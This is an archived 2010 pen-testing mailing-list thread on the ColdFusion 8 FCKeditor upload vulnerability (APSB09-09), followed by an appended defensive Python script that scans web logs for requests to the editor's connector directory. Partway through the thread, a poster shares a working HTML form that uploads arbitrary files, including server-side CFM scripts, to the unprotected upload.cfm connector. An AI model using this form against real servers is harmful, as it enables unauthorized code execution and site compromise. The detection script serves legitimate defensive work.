Penetration Testing mailing list archives
Re: ColdFusion 8 w/ FCKEditor
From: The Dead <th3d34d () gmail com>
Date: Wed, 30 Jun 2010 17:59:04 -0300
I got two servers with this condition. In one of the servers, CFM files were allowed to be uploaded as ASP and others. It was simple to upload to the server using an HTML-based form as:

    <html>
    <form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?" method="post" enctype="multipart/form-data">
    <input type="file" name="NewFile"></input>
    <input type="submit">
    </form>
    </html>

In another server, CFM extensions and others like ASP, PHP are not allowed to be uploaded. So, I'm trying something to solve this case.

On Wed, Jun 30, 2010 at 5:27 PM, The Dead <th3d34d () gmail com> wrote:

Thanks. I already got it!! Case solved!

On Wed, Jun 30, 2010 at 5:06 PM, ADAMS, JEFF W (ATTSI) <ja3617 () att com> wrote:

This should get you started :)
http://theinterw3bs.com/?m=200910

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of The Dead
Sent: Tuesday, June 29, 2010 4:49 PM
To: pen-test () securityfocus com
Subject: ColdFusion 8 w/ FCKEditor

Hi,

Is there an exploit available for this vulnerability or a detailed page explaining technical details about it? How can I exploit it?

The vulnerability is: http://www.adobe.com/support/security/bulletins/apsb09-09.html.

Thanks!

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board
Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------
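Added example, not part of the original thread or of any poster's code: a log review a defender can run to find requests that reached the FCKeditor connector directory named in the form above. The Combined Log Format, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Connector directory from the upload form quoted in the thread, lower-cased.
CONNECTOR_DIR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"

# Assumption: the web server writes Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2010:17:01:02 -0300] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm? HTTP/1.1" 200 312',
    '198.51.100.9 - - [30/Jun/2010:17:05:40 -0300] "POST /%43FIDE//scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm HTTP/1.1" 403 0',
    '192.0.2.10 - - [30/Jun/2010:17:06:11 -0300] "GET /index.cfm HTTP/1.1" 200 1024',
    'malformed line that the parser must skip',
]

def normalize_path(target):
    """Canonicalize a request target so spelling variants compare equal."""
    path = target.split("?", 1)[0]
    # Decode twice (double encoding), unify slashes, fold case for Windows hosts.
    path = unquote(unquote(path)).replace("\\", "/").lower()
    return posixpath.normpath(re.sub(r"/{2,}", "/", path))

def find_connector_requests(lines):
    """Return one record per log line that touched the connector directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize_path(m["target"])
        if not path.startswith(CONNECTOR_DIR):
            continue
        status = int(m["status"])
        # A POST answered with 2xx deserves a look at the upload directory.
        accepted = m["method"] == "POST" and 200 <= status < 300
        hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                     "path": path, "status": status,
                     "severity": "high" if accepted else "review"})
    return hits

if __name__ == "__main__":
    for hit in find_connector_requests(SAMPLE_LOG):
        print(hit)
```

Any hit on a host where the editor's file manager is not intentionally exposed is worth following up, and the Adobe bulletin linked in the thread (APSB09-09) is the reference for the fix.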